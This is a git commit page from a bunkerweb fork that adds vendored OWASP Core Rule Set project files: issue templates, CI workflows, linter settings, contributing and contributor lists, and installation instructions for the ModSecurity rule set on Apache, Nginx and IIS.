Makussu/bunkerweb
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity

bunkerweb 1.4.0

Browse Source
This commit is contained in:
bunkerity
2022-06-03 17:24:14 +02:00
parent 3a078326c5
commit a9f886804a
5245 changed files with 1432051 additions and 27894 deletions
Download Patch File Download Diff File Expand all files Collapse all files

34
core/modsecurity/files/coreruleset/.github/ISSUE_TEMPLATE/01_false-positive.md vendored Normal file
View File

@@ -0,0 +1,34 @@
---
name: 'False positive'
about: Report a false positive (incorrect blocking)
title: ''
labels: 'False Positive'
assignees: ''
---
### Description
<!-- Please provide a copy of the audit log entry. You can usually -->
<!-- find this at /var/log/modsec_audit.log. -->
<!-- Include any relevant CVEs or research links. -->
### Audit Logs / Triggered Rule Numbers
<!-- Everything you can provide about a blocked request/response -->
<!-- or, at least, a list of triggered CRS rule numbers. -->
### Your Environment
<!-- Include as many relevant details about the environment you -->
<!-- experienced the bug in: -->
* CRS version (e.g., v3.2.0):
* Paranoia level setting:
* ModSecurity version (e.g., 2.9.3):
* Web Server and version (e.g., apache 2.4.41):
* Operating System and version:
### Confirmation
[ ] I have removed any personal data (email addresses, IP addresses,
passwords, domain names) from any logs posted.

33
core/modsecurity/files/coreruleset/.github/ISSUE_TEMPLATE/02_false-negative.md vendored Normal file
View File

@@ -0,0 +1,33 @@
---
name: 'False negative'
about: Report a false negative (incorrect bypass)
title: ''
labels: 'False Negative - Evasion'
assignees: ''
---
### Description
<!-- Please provide the payload you are sending. For complex payloads -->
<!-- with headers, please include a curl command. -->
<!-- Include any relevant CVEs or research links. -->
<!-- If the bypass works in paranoia level 4, please consider sending -->
<!-- us an email instead. See -->
<!-- https://github.com/SpiderLabs/owasp-modsecurity-crs/security/policy -->
<!-- for details. -->
### Your Environment
<!-- Include as many relevant details about the environment you -->
<!-- experienced the bug in: -->
* CRS version (e.g., v3.2.0):
* Paranoia level setting:
* ModSecurity version (e.g., 2.9.3):
* Web Server and version (e.g., apache 2.4.41):
* Operating System and version:
### Confirmation
[ ] I have removed any personal data (email addresses, IP addresses,
passwords, domain names) from any logs posted.

39
core/modsecurity/files/coreruleset/.github/ISSUE_TEMPLATE/03_bug-report.md vendored Normal file
View File

@@ -0,0 +1,39 @@
---
name: '🐞 Bug report'
about: Create a report to help us improve
title: ''
labels: 'Bug'
assignees: ''
---
### Describe the bug
<!-- A clear and concise description of what the bug is. -->
### Steps to reproduce
<!-- Include steps that will help us recreate the issue. -->
### Expected behaviour
<!-- A clear and concise description of what you expected to happen. -->
### Actual behaviour
<!-- A clear and concise description of what actually happened. -->
<!-- If applicable, add screenshots to help explain your problem. -->
### Additional context
<!-- Add any other context about the problem here. -->
### Your Environment
<!-- Include as many relevant details about the environment you -->
<!-- experienced the bug in: -->
* CRS version (e.g., v3.2.0):
* Paranoia level setting:
* ModSecurity version (e.g., 2.9.3):
* Web Server and version (e.g., apache 2.4.41):
* Operating System and version:

28
core/modsecurity/files/coreruleset/.github/ISSUE_TEMPLATE/04_feature.md vendored Normal file
View File

@@ -0,0 +1,28 @@
---
name: '🚀 Feature request'
about: Suggest an idea for this project
title: ''
labels: 'Feature Request'
assignees: ''
---
### Motivation
<!-- A clear and concise description of what the motivation for the -->
<!-- new feature is, and what problem it is solving. -->
### Proposed solution
<!-- A clear and concise description of the feature you would like -->
<!-- to add, and how it solves the motivating problem. -->
### Alternatives
<!-- A clear and concise description of any alternative solutions -->
<!-- or features you've considered, and why you're proposed solution is -->
<!-- better. -->
### Additional context
<!-- Add any other context or screenshots about the feature request -->
<!-- here. -->

8
core/modsecurity/files/coreruleset/.github/ISSUE_TEMPLATE/config.yml vendored Normal file
View File

@@ -0,0 +1,8 @@
blank_issues_enabled: false
contact_links:
- name: Help and support
url: https://security.stackexchange.com/questions/tagged/owasp-crs
about: For help and support please go here.
- name: OWASP Core Rule Set mailing list
url: https://groups.google.com/a/owasp.org/forum/#!forum/modsecurity-core-rule-set-project
about: Ask general usage questions and participate in discussions on the CRS.

38
core/modsecurity/files/coreruleset/.github/workflows/lint.yaml vendored Normal file
View File

@@ -0,0 +1,38 @@
---
name: Lint
on: [push, pull_request]
jobs:
check-syntax:
runs-on: ubuntu-latest
strategy:
fail-fast: true
# check why is failing and change afterwards
steps:
- name: Checkout repo
uses: actions/checkout@v2
- name: Lint Yaml
uses: ibiqlik/action-yamllint@v1
with:
file_or_dir: tests/regression/tests/**/*.yaml
config_file: .yamllint.yml
- name: Linelint
uses: fernandrone/linelint@master
id: linelint
- name: Set up Python 3
uses: actions/setup-python@v1
with:
python-version: 3.6
- name: "Check CRS syntax"
run: |
python -V
pip install --upgrade setuptools
pip install -r tests/integration/requirements.txt
git clone https://github.com/CRS-support/secrules_parsing
pip install -r secrules_parsing/requirements.txt
python secrules_parsing/secrules_parser.py -c -f rules/*.conf

19
core/modsecurity/files/coreruleset/.github/workflows/stale.yml vendored Normal file
View File

@@ -0,0 +1,19 @@
name: Mark stale issues
on:
schedule:
- cron: "0 0 * * *"
jobs:
stale:
runs-on: ubuntu-latest
steps:
- uses: actions/stale@v1
with:
repo-token: ${{ secrets.GITHUB_TOKEN }}
stale-issue-message: 'This issue has been open 120 days with no activity. Remove the stale label or comment, or this will be closed in 14 days'
stale-issue-label: 'Stale issue'
days-before-stale: 120
days-before-close: 14

74
core/modsecurity/files/coreruleset/.github/workflows/test.yml vendored Normal file
View File

@@ -0,0 +1,74 @@
---
name: Regression Tests
on:
push:
paths:
- 'rules/**'
- 'tests/**'
- '.github/**'
pull_request:
paths:
- 'rules/**'
- 'tests/**'
- '.github/**'
jobs:
# "modsec2-apache", "modsec3-apache", "modsec3-nginx"
regression:
runs-on: ubuntu-latest
strategy:
# change to true
fail-fast: false
matrix:
modsec_version: [modsec2-apache]
tests: [REQUEST-911-METHOD-ENFORCEMENT,
REQUEST-913-SCANNER-DETECTION,
REQUEST-920-PROTOCOL-ENFORCEMENT,
REQUEST-921-PROTOCOL-ATTACK,
REQUEST-930-APPLICATION-ATTACK-LFI,
REQUEST-931-APPLICATION-ATTACK-RFI,
REQUEST-932-APPLICATION-ATTACK-RCE,
REQUEST-933-APPLICATION-ATTACK-PHP,
REQUEST-934-APPLICATION-ATTACK-NODEJS,
REQUEST-941-APPLICATION-ATTACK-XSS,
REQUEST-942-APPLICATION-ATTACK-SQLI,
REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION,
REQUEST-944-APPLICATION-ATTACK-JAVA]
# Will include soon for modsec3-nginx
steps:
- name: Checkout repo
uses: actions/checkout@v2
- name: Set up Python 2
uses: actions/setup-python@v1
with:
python-version: 2.7
- name: "Run tests for ${{ matrix.modsec_version }}`"
env:
CONFIG: ${{ matrix.modsec_version }}
run: |
python -V
mkdir -p logs/"${CONFIG}"
docker-compose -f ./tests/docker-compose.yml up -d "${CONFIG}"
pip install --upgrade setuptools
pip install -r tests/regression/requirements.txt
# Use mounted volume path
if [[ "${CONFIG}" == *"nginx" ]]; then
LOGDIR="/var/log/nginx"
else
LOGDIR="/var/log/apache2"
fi
sed -ie "s:${LOGDIR}:${GITHUB_WORKSPACE}/logs/${CONFIG}:g" tests/regression/config.ini
py.test -vs tests/regression/CRS_Tests.py \
--config="${CONFIG}" \
--ruledir=./tests/regression/tests/${{ matrix.tests }}
- name: Clean docker-compose
env:
CONFIG: modsec2-apache
run: |
docker-compose -f ./tests/docker-compose.yml stop "${CONFIG}"
docker-compose -f ./tests/docker-compose.yml down

21
core/modsecurity/files/coreruleset/.gitignore vendored Normal file
View File

@@ -0,0 +1,21 @@
*.swp
*.swo
# User configuration
crs-setup.conf
rules/REQUEST-900-EXCLUSION-RULES-BEFORE-CRS.conf
rules/RESPONSE-999-EXCLUSION-RULES-AFTER-CRS.conf
# The MaxMind GeoIP database can be downloaded or upgraded by running:
# util/upgrade.py geoip
util/geo-location/GeoIP.dat
# Unit test caches
.cache
# Byte-compiled / optimized / DLL files
__pycache__/
*.py[cod]
*$py.class
.idea/

4
core/modsecurity/files/coreruleset/.gitmodules vendored Normal file
View File

@@ -0,0 +1,4 @@
[submodule "docs/OWASP-CRS-Documentation"]
path = docs/OWASP-CRS-Documentation
url = https://github.com/SpiderLabs/OWASP-CRS-Documentation
branch = master

12
core/modsecurity/files/coreruleset/.linelint.yml Normal file
View File

@@ -0,0 +1,12 @@
rules:
# checks if file ends in a newline character
end-of-file:
# set to true to enable this rule
enable: true
# set to true to disable autofix (if enabled globally)
disable-autofix: true
# will be ignored only by this rule
ignore:
- .pytest_cache/*

31
core/modsecurity/files/coreruleset/.travis.yml Normal file
View File

@@ -0,0 +1,31 @@
os: linux
language: python
python:
- 2.7
# no more required in travis
#sudo: required
services:
- docker
jobs:
include:
script:
- |
if [[ "$TRAVIS_PULL_REQUEST" != "false" ]]; then
docker run -ti --name crs-test --entrypoint /docker-entrypoint.sh -e REPO=$TRAVIS_PULL_REQUEST_SLUG -e BRANCH=$TRAVIS_PULL_REQUEST_BRANCH themiddle/crs-test
else
docker run -ti --name crs-test --entrypoint /docker-entrypoint.sh -e REPO=$TRAVIS_REPO_SLUG -e BRANCH=$TRAVIS_BRANCH themiddle/crs-test
fi
# safelist
branches:
only:
- v3.1/dev
- v3.2/dev
- v3.3/dev
- fix-travis
#notifications:
# irc: "chat.freenode.net#modsecurity"

18
core/modsecurity/files/coreruleset/.yamllint.yml Normal file
View File

@@ -0,0 +1,18 @@
extends: default
rules:
# Test lines can be big
line-length:
max: 1024
level: warning
# These files below have very large lines, needed for the test.
# So they will raise warnings every time.
ignore: |
tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920380.yaml
tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920390.yaml
tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941360.yaml
# don't bother me with this rule
indentation: disable
comments: {require-starting-space: false}

1443
core/modsecurity/files/coreruleset/CHANGES Normal file
View File

File diff suppressed because it is too large Load Diff

152
core/modsecurity/files/coreruleset/CONTRIBUTING.md Normal file
View File

@@ -0,0 +1,152 @@
# Contributing to the CRS
We value third-party contributions. To keep things simple for you and us,
please adhere to the following contributing guidelines.
## Getting Started
* You will need a [GitHub account](https://github.com/signup/free).
* Submit a [ticket for your issue](https://github.com/SpiderLabs/owasp-modsecurity-crs/issues), assuming one does not already exist.
* Clearly describe the issue including steps to reproduce when it is a bug.
* Make sure you specify the version that you know has the issue.
* Bonus points for submitting a failing test along with the ticket.
* If you don't have push access, fork the repository on GitHub.
## Making Changes
* Please base your changes on branch ```v3.3/dev```
* Create a topic branch for your feature or bug fix.
* Please fix only one problem at a time; this will help to quickly test and merge your change. If you intend to fix multiple unrelated problems, please use a separate branch for each problem.
* Make commits of logical units.
* Make sure your commits adhere to the rules guidelines below.
* Make sure your commit messages are in the [proper format](http://tbaggery.com/2008/04/19/a-note-about-git-commit-messages.html): The first line of the message should have 50 characters or less, separated by a blank line from the (optional) body. The body should be wrapped at 70 characters and paragraphs separated by blank lines. Bulleted lists are also fine.
## General Formatting Guidelines for rules contributions
- 4 spaces per indentation level, no tabs
- no trailing whitespace at EOL or trailing blank lines at EOF
- comments are good, especially when they clearly explain the rule
- try to adhere to a 80 character line length limit
- if it is a [chained rule](https://github.com/SpiderLabs/ModSecurity/wiki/Reference-Manual#chain), alignment should be like
```
SecRule .. ..\
"...."
SecRule .. ..\
"..."
SecRule .. ..\
".."
```
- use quotes even if there is only one action, it improves readability (e.g., use `"chain"`, not `chain`, or `"ctl:requestBodyAccess=Off"` instead of `ctl:requestBodyAccess=Off`)
- always use numbers for phases, instead of names
- format your `SecMarker` between double quotes, using UPPERCASE and separating words using hyphens. Examples are:
```
SecMarker "END-RESPONSE-959-BLOCKING-EVALUATION"
SecMarker "END-REQUEST-910-IP-REPUTATION"
```
- the proposed order for actions is:
```
id
phase
allow | block | deny | drop | pass | proxy | redirect
status
capture
t:xxx
log
nolog
auditlog
noauditlog
msg
logdata
tag
sanitiseArg
sanitiseRequestHeader
sanitiseMatched
sanitiseMatchedBytes
ctl
ver
severity
multiMatch
initcol
setenv
setvar
expirevar
chain
skip
skipAfter
```
## Variable naming conventions
* Variable names are lowercase using chars from `[a-z0-9_]`
* To somewhat reflect the fact that the syntax for variable usage is different when you define it (using setvar) and when you use it, we propose the following visual distinction:
* Lowercase letters for collection, dot as separator, variable name. E.g.,: `setvar:tx.foo_bar_variable`
* Capital letters for collection, colon as separator, variable name. E.g.,: `SecRule TX:foo_bar_variable`
## Rules compliance with each Paranoia Level (PL)
Rules in the CRS are organized in Paranoia Levels, which allows you to choose the desired level of rule checks.
Please read file ```crs-setup.conf.example``` for an introduction and a more detailed explanation of Paranoia Levels in the section `# -- [[ Paranoia Level Initialization ]]`.
**PL0:**
* Modsec installed, but almost no rules
**PL1:**
* Default level, keep in mind that most installations will normally use this one
* If there is a complex memory consuming/evaluation rule it surely will be on upper levels, not this one
* Normally we will use atomic checks in single rules
* Confirmed matches only, all scores are allowed
* No false positives / Low FP (Try to avoid adding rules with potential false positives!)
* False negatives could happen
**PL2:**
* Chains usage are OK
* Confirmed matches use score critical
* Matches that cause false positives are limited to use score notice or warning
* Low False positive rates
* False negatives are not desirable
**PL3:**
* Chains usage with complex regex look arounds and macro expansions
* Confirmed matches use score warning or critical
* Matches that cause false positives are limited to use score notice
* False positive rates increased but limited to multiple matches (not single string)
* False negatives should be a very unlikely accident
**PL4:**
* Every item is inspected
* Variable creations allowed to avoid engine limitations
* Confirmed matches use score notice, warning or critical
* Matches that cause false positives are limited to use score notice and warning
* False positive rates increased (even on single string)
* False negatives should not happen here
* Check everything against RFC and white listed values for most popular elements
## ID Numbering Scheme
The CRS project used the numerical id rule namespace from 900,000 to 999,999 for the CRS rules as well as 9,000,000 to 9,999,999 for default CRS rule exclusion packages.
Rules applying to the incoming request use the id range 900,000 to 949,999.
Rules applying to the outgoing response use the id range 950,000 to 999,999.
The rules are grouped by vulnerability class they address (SQLi, RCE, etc.) or functionality (initialization). These groups occupy blocks of thousands (e.g. SQLi: 942,000 - 942,999).
The grouped rules are defined in files dedicated to a single group or functionality. The filename takes up the first three digits of the rule ids defined within the file (e.g. SQLi: REQUEST-942-APPLICATION-ATTACK-SQLI.conf).
The individual rule files for the vulnerability classes are organized by the paranoia level of the rules. PL 1 is first, then PL 2 etc.
The block from 9XX000 - 9XX099 is reserved for use by CRS helper functionality. There are no blocking or filtering rules in this block.
Among the rules serving a CRS helper functionality are rules that skip rules depending on the paranoia level. These rules always use the following reserved rule ids: 9XX011-9XX018 with very few exceptions.
The blocking or filter rules start with 9XX100 with a step width of 10. E.g. 9XX100, 9XX110, 9XX120 etc. The rule id does not correspond directly with the paranoia level of a rule. Given the size of a rule group and the organization by lower PL rules first, PL2 and above tend to have rule IDs with higher numbers.
Within a rule file / block, there are sometimes smaller groups of rules that belong to together. They are closely linked and very often represent copies of the original rules with a stricter limit (alternatively, they can represent the same rule addressing a different target in a second rule where this was necessary). These are stricter siblings of the base rule. Stricter siblings usually share the first five digits of the rule ID and raise the rule ID by one. E.g., Base rule at 9XX160, stricter sibling at 9XX161.
Stricter siblings often have a different paranoia level. This means that the base rule and the stricter sibling do not reside next to one another in the rule file. Instead they are ordered in their appropriate paranoia level and can be linked via the first digits of the rule id. It is a good practice to introduce stricter siblings together with the base rule in the comments of the base rule and to reference the base rule with the keyword stricter sibling in the comments of the stricter sibling. E.g., "... This is
performed in two separate stricter siblings of this rule: 9XXXX1 and 9XXXX2", "This is a stricter sibling of rule 9XXXX0."

85
core/modsecurity/files/coreruleset/CONTRIBUTORS.md Normal file
View File

@@ -0,0 +1,85 @@
# Contributors
## Project Co-Leads:
- [Chaim Sanders](https://github.com/csanders-git)
- [Christian Folini](https://github.com/dune73)
- [Walter Hop](https://github.com/lifeforms)
## Developers:
- [Franziska Bühler](https://github.com/franbuehler)
- [Christoph Hansen](https://github.com/emphazer)
- [Ervin Hegedus](https://github.com/airween)
- [Victor Hora](https://github.com/victorhora)
- [Andrea Menin](https://github.com/theMiddleBlue)
- [Federico G. Schwindt](https://github.com/fgsch)
- [Manuel Spartan](https://github.com/spartantri)
- [Felipe Zimmerle](https://github.com/zimmerle)
- [Felipe Zipitría](https://github.com/fzipi)
## Contributors:
- [agusmu](https://github.com/agusmu)
- [Zack Allen](https://github.com/zmallen)
- [azhao155](https://github.com/azhao155)
- [azurit](https://github.com/azurit)
- [Matt Bagley](https://github.com/bagley)
- [Ryan Barnett](https://github.com/rcbarnett)
- [soufianebenali](https://github.com/soufianebenali)
- [Peter Bittner](https://github.com/bittner)
- [Allan Boll](https://github.com/allanbomsft)
- [Jeremy Brown](https://github.com/jwbrown77)
- [Brent Clark](https://github.com/brentclark)
- [Jonathan Claudius](https://github.com/claudijd)
- [coolt](https://github.com/coolt)
- [Ashish Dixit](https://github.com/tundal45)
- [Padraig Doran](https://github.com/padraigdoran)
- [Dan Ehrlich](https://github.com/danehrlich1)
- [Umar Farook](https://github.com/umarfarook882)
- [FrozenSolid](https://github.com/frozenSolid)
- [Pásztor Gábor](https://github.com/gpasztor87)
- [Aaron Haaf](https://github.com/Everspace)
- [Michael Haas](https://github.com/MichaelHaas)
- [jamuse](https://github.com/jamuse)
- [jeremyjpj0916](https://github.com/jeremyjpj0916)
- [jschleus](https://github.com/jschleus)
- [Krzysztof Kotowicz](https://github.com/koto)
- [Max Leske](https://github.com/theseion)
- Manuel Leos
- [Evgeny Marmalstein](https://github.com/shimshon70)
- [meetug](https://github.com/meetug)
- [Christian Mehlmauer](https://github.com/FireFart)
- [Glyn Mooney](https://github.com/skidoosh)
- [na1ex](https://github.com/na1ex)
- [Jose Nazario](https://github.com/paralax)
- [Tim Herren](https://github.com/nerrehmit)
- [Scott O'Neil](https://github.com/cPanelScott)
- [Fernando Outeda](https://github.com/fog94)
- [NullIsNot0](https://github.com/NullIsNot0)
- [Robert Paprocki](https://github.com/p0pr0ck5)
- [Christian Peron](https://github.com/csjperon)
- [Elia Pinto](https://github.com/yersinia)
- [pyllyukko](https://github.com/pyllyukko)
- [Brian Rectanus](https://github.com/b1v1r)
- [Rufus125](https://github.com/Rufus125)
- Ofer Shezaf
- Breno Silva
- siric\_
- Emile-Hugo Spir
- [Marc Stern](https://github.com/marcstern)
- [Simon Studer](https://github.com/studersi)
- [supplient](https://github.com/supplient)
- [theMiddle](https://github.com/theMiddleBlue)
- [Ben Williams](https://github.com/benwilliams)
- [Anna Winkler](https://github.com/annawinkler)
- [Avery Wong](https://github.com/4v3r9)
- [Will Woodson](https://github.com/wjwoodson)
- [Greg Wroblewski](https://github.com/gwroblew)
- [XeroChen](https://github.com/XeroChen)
- [ygrek](https://github.com/ygrek)
- [Yu Yagihashi](https://github.com/yagihash)
- [Zino](https://github.com/zinoe)
- Josh Zlatin
- [Zou Guangxian](https://github.com/zouguangxian)
- [4ft35t](https://github.com/4ft35t)

305
core/modsecurity/files/coreruleset/INSTALL Normal file
View File

@@ -0,0 +1,305 @@
_____ _____ _____ ____
/ ____| __ \ / ____| |___ \
| | | |__) | (___ __) |
| | | _ / \___ \ |__ <
| |____| | \ \ ____) | ___) |
\_____|_| \_\_____/ |____/
OWASP Core Rule Set 3.x
Installing ModSecurity
=====================
This document does NOT detail how to install ModSecurity. Rather,
only information pertaining to the installation of the OWASP Core
Rule Set (CRS) is provided. However, ModSecurity is a prerequisite
for the CRS installation. Information on installing ModSecurity
can be found within the ModSecurity project at
https://github.com/SpiderLabs/ModSecurity or at ModSecurity.org.
Installing From a Package Manager
=================================
The OWASP Core Rule Set (CRS) is available from many sources. On
multiple platforms this includes package managers. These packages are
maintained by independent packagers who package CRS in their own time.
Historically, many of these packages have been out of date. As such,
it is recommended that you install, where possible, from our GitHub
repository. The following CRS 3.x packages are known to exist:
modsecurity-crs - Debian
mod_security_crs - Fedora
modsecurity-crs - Gentoo
Packages of CRS 2.x are incompatible with CRS 3.x.
Installing
==========
You can download a copy of the CRS from the following URL:
https://coreruleset.org/installation/
Our release zip/tar.gz files are the preferred way to install CRS.
However, if you want to follow rule development closely and get
the newest protections quickly, you can also clone our GitHub
repository to get the current work-in-progress for the next release.
Prerequisites
-------------
CRS is designed to be used with ModSecurity (although many other
projects also use the provided rules). CRS version 3.x is designed for
ModSecurity 2.8 or above. CRS version 3.x makes use of libinjection
and libXML2. Failure to provide these prerequisites may result in
serious false negatives and CRS version 3.x should NOT be run without
these. Note, however, that libinjection is bundled with ModSecurity
since version 2.8. Additionally, if you are downloading from the
GitHub repo you will need to install 'git' on your system.
Upgrading from CRS 2.x
----------------------
CRS 3.x is a major release incompatible with CRS 2.x.
The rule IDs have changed. The file id_renumbering/IdNumbering.csv
contains a list with old and new rule IDs. However, a key feature
of the release 3.x is the reduction of false positives in the
default installation and we recommend you start with a fresh
install from scratch.
Key parameter variables have changed their name and new features
have been introduced. Your former modsecurity_crs_10_setup.conf
file is thus no longer usable.
We recommend you to start with a fresh install from scratch.
Installing on Apache
--------------------
1. Install ModSecurity for Apache
2. Ensure that ModSecurity is loading correctly by checking error.log
at start up for lines indicating ModSecurity is installed. An example
might appear as follows:
```ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/) configured.```
3. The most common method of deploying ModSecurity we have seen is
to create a new folder underneath the Apache directory (typically
/usr/local/apache/, /etc/httpd/, or /etc/apache2). Often this folder
is called 'modsecurity.d'. Create this folder and cd into it.
4. Download our release from https://coreruleset.org/installation/
and unpack it into a new owasp-modsecurity-crs folder.
5. Move the crs-setup.conf.example file to crs-setup.conf.
Please take the time to go through this file and customize the settings
for your local environment. Failure to do so may result in false
negatives and false positives. See the section entitled OWASP CRS
Configuration for more detail.
6. Rename rules/REQUEST-900-EXCLUSION-RULES-BEFORE-CRS.conf.example and
rules/RESPONSE-999-EXCLUSION-RULES-AFTER-CRS.conf.example to remove the
'.example' extension. This will allow you to add exclusions without updates
overwriting them in the future.
7. Add the following line to your httpd.conf/apache2.conf (the following
assumes you've put CRS into modsecurity.d/owasp-modsecurity-crs). You
can alternatively place these in any config file included by Apache:
```
<IfModule security2_module>
Include modsecurity.d/owasp-modsecurity-crs/crs-setup.conf
Include modsecurity.d/owasp-modsecurity-crs/rules/*.conf
</IfModule>
```
8. Restart web server and ensure it starts without errors
9. Make sure your web sites are still running fine.
10. Proceed to the section "Testing the Installation" below.
Installing on Nginx
-------------------
1. Compile ModSecurity into Nginx
2. Ensure that ModSecurity is loading correctly by checking error.log
at start up for lines indicating ModSecurity is installed. An example
might appear as follows:
```ModSecurity for nginx (STABLE)/2.9.1 (http://www.modsecurity.org/) configured.```
3. The most common method of deploying ModSecurity we have seen is
to create a new folder underneath the Nginx directory (typically
/usr/local/nginx/conf/). Often this folder
is called 'owasp-modsecurity-crs'. Create this folder and cd into it.
4. Download our release from https://coreruleset.org/installation/
and unpack it into a new owasp-modsecurity-crs folder.
5. Move the crs-setup.conf.example file to crs-setup.conf.
Please take this time to go through this
file and customize the settings for your local environment. Failure to
do so may result in false negatives and false positives. See the
section entitled OWASP CRS Configuration for more detail.
6. Rename rules/REQUEST-900-EXCLUSION-RULES-BEFORE-CRS.conf.example and
rules/RESPONSE-999-EXCLUSION-RULES-AFTER-CRS.conf.example to remove the
'.example' extension. This will allow you to add exceptions without updates
overwriting them in the future.
7. Nginx requires the configuration of a single ModSecurity
configuration file within the nginx.conf file using the
'ModSecurityConfig' directive (when using ModSecurity 2.x).
Best practice is to set 'ModSecurityConfig' to a file from
which you will include your other ModSecurity configuration
files. In this example we will use:
```ModSecurityConfig modsec_includes.conf;```
7. Within modsec_includes.conf create your includes to the
CRS folder similar to as follows (The modsecurity.conf file from the
ModSecurity installation is included in this example):
```
include modsecurity.conf
include owasp-modsecurity-crs/crs-setup.conf
include owasp-modsecurity-crs/rules/REQUEST-900-EXCLUSION-RULES-BEFORE-CRS.conf
include owasp-modsecurity-crs/rules/REQUEST-901-INITIALIZATION.conf
include owasp-modsecurity-crs/rules/REQUEST-903.9001-DRUPAL-EXCLUSION-RULES.conf
include owasp-modsecurity-crs/rules/REQUEST-903.9002-WORDPRESS-EXCLUSION-RULES.conf
include owasp-modsecurity-crs/rules/REQUEST-903.9003-NEXTCLOUD-EXCLUSION-RULES.conf
include owasp-modsecurity-crs/rules/REQUEST-903.9004-DOKUWIKI-EXCLUSION-RULES.conf
include owasp-modsecurity-crs/rules/REQUEST-903.9005-CPANEL-EXCLUSION-RULES.conf
include owasp-modsecurity-crs/rules/REQUEST-903.9006-XENFORO-EXCLUSION-RULES.conf
include owasp-modsecurity-crs/rules/REQUEST-905-COMMON-EXCEPTIONS.conf
include owasp-modsecurity-crs/rules/REQUEST-910-IP-REPUTATION.conf
include owasp-modsecurity-crs/rules/REQUEST-911-METHOD-ENFORCEMENT.conf
include owasp-modsecurity-crs/rules/REQUEST-912-DOS-PROTECTION.conf
include owasp-modsecurity-crs/rules/REQUEST-913-SCANNER-DETECTION.conf
include owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf
include owasp-modsecurity-crs/rules/REQUEST-921-PROTOCOL-ATTACK.conf
include owasp-modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf
include owasp-modsecurity-crs/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf
include owasp-modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf
include owasp-modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf
include owasp-modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf
include owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf
include owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf
include owasp-modsecurity-crs/rules/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION.conf
include owasp-modsecurity-crs/rules/REQUEST-944-APPLICATION-ATTACK-JAVA.conf
include owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf
include owasp-modsecurity-crs/rules/RESPONSE-950-DATA-LEAKAGES.conf
include owasp-modsecurity-crs/rules/RESPONSE-951-DATA-LEAKAGES-SQL.conf
include owasp-modsecurity-crs/rules/RESPONSE-952-DATA-LEAKAGES-JAVA.conf
include owasp-modsecurity-crs/rules/RESPONSE-953-DATA-LEAKAGES-PHP.conf
include owasp-modsecurity-crs/rules/RESPONSE-954-DATA-LEAKAGES-IIS.conf
include owasp-modsecurity-crs/rules/RESPONSE-959-BLOCKING-EVALUATION.conf
include owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf
include owasp-modsecurity-crs/rules/RESPONSE-999-EXCLUSION-RULES-AFTER-CRS.conf
```
8. Restart web server and ensure it starts without errors
9. Make sure your web sites are still running fine.
10. Proceed to the section "Testing the Installation" below.
Installing on IIS
-----------------
The IIS installer comes with an optional version of CRS built in.
To upgrade or install this after the fact follow the following
steps.
1. Navigate to "[drive_letters]:\Program Files\ModSecurity IIS\"
2. Download our release from https://coreruleset.org/installation/
and unpack it into the current folder.
3. Move the crs-setup.conf.example file to crs-setup.conf.
Please take this time to go through this
file and customize the settings for your local environment. Failure to
do so may result in false negatives and false positives. See the
section entitled OWASP CRS Configuration for more detail.
4. Rename rules/REQUEST-900-EXCLUSION-RULES-BEFORE-CRS.conf.example and
rules/RESPONSE-999-EXCLUSION-RULES-AFTER-CRS.conf.example to remove the
'.example' extension. This will allow you to add exceptions without updates
overwriting them in the future.
5. Navigate back to the 'ModSecurity IIS' folder and modify the
'modsecurity_iis' to include the following:
```
include owasp-modsecurity-crs/crs-setup.conf
include owasp-modsecurity-crs/rules/REQUEST-900-EXCLUSION-RULES-BEFORE-CRS.conf
include owasp-modsecurity-crs/rules/REQUEST-901-INITIALIZATION.conf
include owasp-modsecurity-crs/rules/REQUEST-905-COMMON-EXCEPTIONS.conf
include owasp-modsecurity-crs/rules/REQUEST-910-IP-REPUTATION.conf
include owasp-modsecurity-crs/rules/REQUEST-911-METHOD-ENFORCEMENT.conf
include owasp-modsecurity-crs/rules/REQUEST-912-DOS-PROTECTION.conf
include owasp-modsecurity-crs/rules/REQUEST-913-SCANNER-DETECTION.conf
include owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf
include owasp-modsecurity-crs/rules/REQUEST-921-PROTOCOL-ATTACK.conf
include owasp-modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf
include owasp-modsecurity-crs/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf
include owasp-modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf
include owasp-modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf
include owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf
include owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf
include owasp-modsecurity-crs/rules/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION.conf
include owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf
include owasp-modsecurity-crs/rules/RESPONSE-950-DATA-LEAKAGES.conf
include owasp-modsecurity-crs/rules/RESPONSE-951-DATA-LEAKAGES-SQL.conf
include owasp-modsecurity-crs/rules/RESPONSE-952-DATA-LEAKAGES-JAVA.conf
include owasp-modsecurity-crs/rules/RESPONSE-953-DATA-LEAKAGES-PHP.conf
include owasp-modsecurity-crs/rules/RESPONSE-954-DATA-LEAKAGES-IIS.conf
include owasp-modsecurity-crs/rules/RESPONSE-959-BLOCKING-EVALUATION.conf
include owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf
